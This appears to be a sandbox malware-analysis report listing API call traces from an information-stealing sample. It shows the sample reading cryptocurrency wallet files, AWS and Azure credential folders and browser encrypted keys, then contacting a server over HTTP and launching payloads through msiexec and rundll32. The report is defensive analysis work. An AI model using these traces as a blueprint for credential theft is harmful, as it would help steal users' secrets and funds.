                            • lstrcat.KERNEL32(?,00101490), ref: 000ED2E3
                              • Part of subcall function 000FA820: lstrlen.KERNEL32(000E4F05,?,?,000E4F05,00100DDE), ref: 000FA82B
                              • Part of subcall function 000FA820: lstrcpy.KERNEL32(00100DDE,00000000), ref: 000FA885
                            • lstrlen.KERNEL32(?), ref: 000ED32A
                            • lstrlen.KERNEL32(?), ref: 000ED339
                              • Part of subcall function 000FAA70: StrCmpCA.SHLWAPI(012290C8,000EA7A7,?,000EA7A7,012290C8), ref: 000FAA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 000ED3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 77bf37e1065b1bb003e3ac58809babbdf9d6163d918e482d8e45e6b41bc2dd58
                            • Instruction ID: 89455420dd6d133368beb576a77d98a74b3bb09347bfc20f044af028ca705b0b
                            • Opcode Fuzzy Hash: 77bf37e1065b1bb003e3ac58809babbdf9d6163d918e482d8e45e6b41bc2dd58
                            • Instruction Fuzzy Hash: C4E153B1A10108ABCB15EBA0DD95EFE737CBF15301F104058F60AB6492DF75AA0ADB62
                            Function 000EC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0122D590,00000000,?,0010144C,00000000,?,?), ref: 000ECA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000ECA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 000ECA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000ECAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000ECAD9
                            • StrStrA.SHLWAPI(?,0122D4E8,00100B52), ref: 000ECAF7
                            • StrStrA.SHLWAPI(00000000,0122D4A0), ref: 000ECB1E
                            • StrStrA.SHLWAPI(?,0122D680,00000000,?,00101458,00000000,?,00000000,00000000,?,01228FD8,00000000,?,00101454,00000000,?), ref: 000ECCA2
                            • StrStrA.SHLWAPI(00000000,0122D800), ref: 000ECCB9
                              • Part of subcall function 000EC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000EC871
                              • Part of subcall function 000EC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000EC87C
                            • StrStrA.SHLWAPI(?,0122D800,00000000,?,0010145C,00000000,?,00000000,01228FF8), ref: 000ECD5A
                            • StrStrA.SHLWAPI(00000000,012291D8), ref: 000ECD71
                              • Part of subcall function 000EC820: lstrcat.KERNEL32(?,00100B46), ref: 000EC943
                              • Part of subcall function 000EC820: lstrcat.KERNEL32(?,00100B47), ref: 000EC957
                              • Part of subcall function 000EC820: lstrcat.KERNEL32(?,00100B4E), ref: 000EC978
                            • lstrlen.KERNEL32(00000000), ref: 000ECE44
                            • CloseHandle.KERNEL32(00000000), ref: 000ECE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: af6a4ca24d8f12f87756652e04c51783493eb99cdba2e3ff75ab4e721a0ae1b4
                            • Instruction ID: 5683af8da6fa51c19fa391da43b9629f8950a3e1cdda3bfd7da7a07c5d5977ba
                            • Opcode Fuzzy Hash: af6a4ca24d8f12f87756652e04c51783493eb99cdba2e3ff75ab4e721a0ae1b4
                            • Instruction Fuzzy Hash: F6E10FB1A0010CABDB15EBA4DC91FFEB778AF55300F004169F20A67592DF746A4BDB62
                            Function 000F8320 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • RegOpenKeyExA.ADVAPI32(00000000,0122B688,00000000,00020019,00000000,001005B6), ref: 000F83A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000F8426
                            • wsprintfA.USER32 ref: 000F8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000F847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 000F848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 000F8499
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s
                            • API String ID: 3246050789-1643714437
                            • Opcode ID: 2792f7a278d7ef404c7b1c0a121e45c5b2e381c9cf892339b92bd9b2d705b9ad
                            • Instruction ID: 8447c9a8d6bfe46f1da359522751662bd54934dab78711f523c293f467656c13
                            • Opcode Fuzzy Hash: 2792f7a278d7ef404c7b1c0a121e45c5b2e381c9cf892339b92bd9b2d705b9ad
                            • Instruction Fuzzy Hash: 85812DB191011CABDB25DB54CC91FEA77BCBF48700F00C299E209A6581DF746B8ADFA1
                            Function 000F4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000F8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 000F4DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 000F4DCD
                              • Part of subcall function 000F4910: wsprintfA.USER32 ref: 000F492C
                              • Part of subcall function 000F4910: FindFirstFileA.KERNEL32(?,?), ref: 000F4943
                            • lstrcat.KERNEL32(?,00000000), ref: 000F4E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 000F4E59
                              • Part of subcall function 000F4910: StrCmpCA.SHLWAPI(?,00100FDC), ref: 000F4971
                              • Part of subcall function 000F4910: StrCmpCA.SHLWAPI(?,00100FE0), ref: 000F4987
                              • Part of subcall function 000F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000F4B7D
                              • Part of subcall function 000F4910: FindClose.KERNEL32(000000FF), ref: 000F4B92
                            • lstrcat.KERNEL32(?,00000000), ref: 000F4EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 000F4EE5
                              • Part of subcall function 000F4910: wsprintfA.USER32 ref: 000F49B0
                              • Part of subcall function 000F4910: StrCmpCA.SHLWAPI(?,001008D2), ref: 000F49C5
                              • Part of subcall function 000F4910: wsprintfA.USER32 ref: 000F49E2
                              • Part of subcall function 000F4910: PathMatchSpecA.SHLWAPI(?,?), ref: 000F4A1E
                              • Part of subcall function 000F4910: lstrcat.KERNEL32(?,0122E758), ref: 000F4A4A
                              • Part of subcall function 000F4910: lstrcat.KERNEL32(?,00100FF8), ref: 000F4A5C
                              • Part of subcall function 000F4910: lstrcat.KERNEL32(?,?), ref: 000F4A70
                              • Part of subcall function 000F4910: lstrcat.KERNEL32(?,00100FFC), ref: 000F4A82
                              • Part of subcall function 000F4910: lstrcat.KERNEL32(?,?), ref: 000F4A96
                              • Part of subcall function 000F4910: CopyFileA.KERNEL32(?,?,00000001), ref: 000F4AAC
                              • Part of subcall function 000F4910: DeleteFileA.KERNEL32(?), ref: 000F4B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 7b0473172e934d4c25d50f1436fcbc96080739ac9465451571a8b59c68fdccd4
                            • Instruction ID: e418914ad3cf1cfbbc40d41942f485a904a873e8847978665d22deb0f2368af5
                            • Opcode Fuzzy Hash: 7b0473172e934d4c25d50f1436fcbc96080739ac9465451571a8b59c68fdccd4
                            • Instruction Fuzzy Hash: 484173BAA4021867DB20F770DC47FED7738AB64700F004454B689664C6EFF45BC99B92
                            Function 000F9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000F906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 7ddb56ed501ed80484f093a91ccc79786be2157e2f17007b73c34c514c3e33d1
                            • Instruction ID: e407a0dffad2aea6711b289f5fc871648d79c37b2ebee097c7d73fa8ef64e0a1
                            • Opcode Fuzzy Hash: 7ddb56ed501ed80484f093a91ccc79786be2157e2f17007b73c34c514c3e33d1
                            • Instruction Fuzzy Hash: 9C71EAB1A10608EFDB14DBE4DC89FEEBBB9BB48700F108518F615A7290DB34A905DB61
                            Function 000F2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000F31C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000F335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000F34EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: 58457f9675c13bde76f75020f49b49ab7ab283f7305d74cdacfea2bb979d347a
                            • Instruction ID: 45cbf05c90d1f0b53066fc217db206dd547d98d329128e65b13dee1d8d8cc75a
                            • Opcode Fuzzy Hash: 58457f9675c13bde76f75020f49b49ab7ab283f7305d74cdacfea2bb979d347a
                            • Instruction Fuzzy Hash: A11221B190010CAADB15FB90DC52FFDB778AF15340F508169E60A66492EFB42B4EDF62
                            Function 000F52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E6280: InternetOpenA.WININET(00100DFE,00000001,00000000,00000000,00000000), ref: 000E62E1
                              • Part of subcall function 000E6280: StrCmpCA.SHLWAPI(?,0122E878), ref: 000E6303
                              • Part of subcall function 000E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000E6335
                              • Part of subcall function 000E6280: HttpOpenRequestA.WININET(00000000,GET,?,0122E458,00000000,00000000,00400100,00000000), ref: 000E6385
                              • Part of subcall function 000E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000E63BF
                              • Part of subcall function 000E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000E63D1
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000F5318
                            • lstrlen.KERNEL32(00000000), ref: 000F532F
                              • Part of subcall function 000F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000F8E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 000F5364
                            • lstrlen.KERNEL32(00000000), ref: 000F5383
                            • lstrlen.KERNEL32(00000000), ref: 000F53AE
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 502c33642f7c3fde2719d9e1981723960a327ae05eba9096952b0730b2bdb1a5
                            • Instruction ID: fd27c682e2057611a4ac2b7d94956357de09f0c01c5c6119c5bcfc1a6c809a24
                            • Opcode Fuzzy Hash: 502c33642f7c3fde2719d9e1981723960a327ae05eba9096952b0730b2bdb1a5
                            • Instruction Fuzzy Hash: 72511CB0A1014C9BCB14FF64CD92AFD7779AF11341F508018FA0A6A993DF746B4AEB52
                            Function 000F12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 80a20297941cc9a52a0e8ff82837a985407ccdcb14cffad2a99777672e14f589
                            • Instruction ID: da573654c97f6fd0a98749f08bc930b0044fb6e494f1ea55b4b7ddc8853efa0b
                            • Opcode Fuzzy Hash: 80a20297941cc9a52a0e8ff82837a985407ccdcb14cffad2a99777672e14f589
                            • Instruction Fuzzy Hash: B3C165B590021D9BCB14EF60DC89FFA7778BF54304F10459CE60AA7642DB70AA85DF91
                            Function 000F4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000F8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 000F42EC
                            • lstrcat.KERNEL32(?,0122E2A8), ref: 000F430B
                            • lstrcat.KERNEL32(?,?), ref: 000F431F
                            • lstrcat.KERNEL32(?,0122D4D0), ref: 000F4333
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000F8D90: GetFileAttributesA.KERNEL32(00000000,?,000E1B54,?,?,0010564C,?,?,00100E1F), ref: 000F8D9F
                              • Part of subcall function 000E9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000E9D39
                              • Part of subcall function 000E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000E99EC
                              • Part of subcall function 000E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000E9A11
                              • Part of subcall function 000E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000E9A31
                              • Part of subcall function 000E99C0: ReadFile.KERNEL32(000000FF,?,00000000,000E148F,00000000), ref: 000E9A5A
                              • Part of subcall function 000E99C0: LocalFree.KERNEL32(000E148F), ref: 000E9A90
                              • Part of subcall function 000E99C0: CloseHandle.KERNEL32(000000FF), ref: 000E9A9A
                              • Part of subcall function 000F93C0: GlobalAlloc.KERNEL32(00000000,000F43DD,000F43DD), ref: 000F93D3
                            • StrStrA.SHLWAPI(?,0122E368), ref: 000F43F3
                            • GlobalFree.KERNEL32(?), ref: 000F4512
                              • Part of subcall function 000E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000E4EEE,00000000,00000000), ref: 000E9AEF
                              • Part of subcall function 000E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000E4EEE,00000000,?), ref: 000E9B01
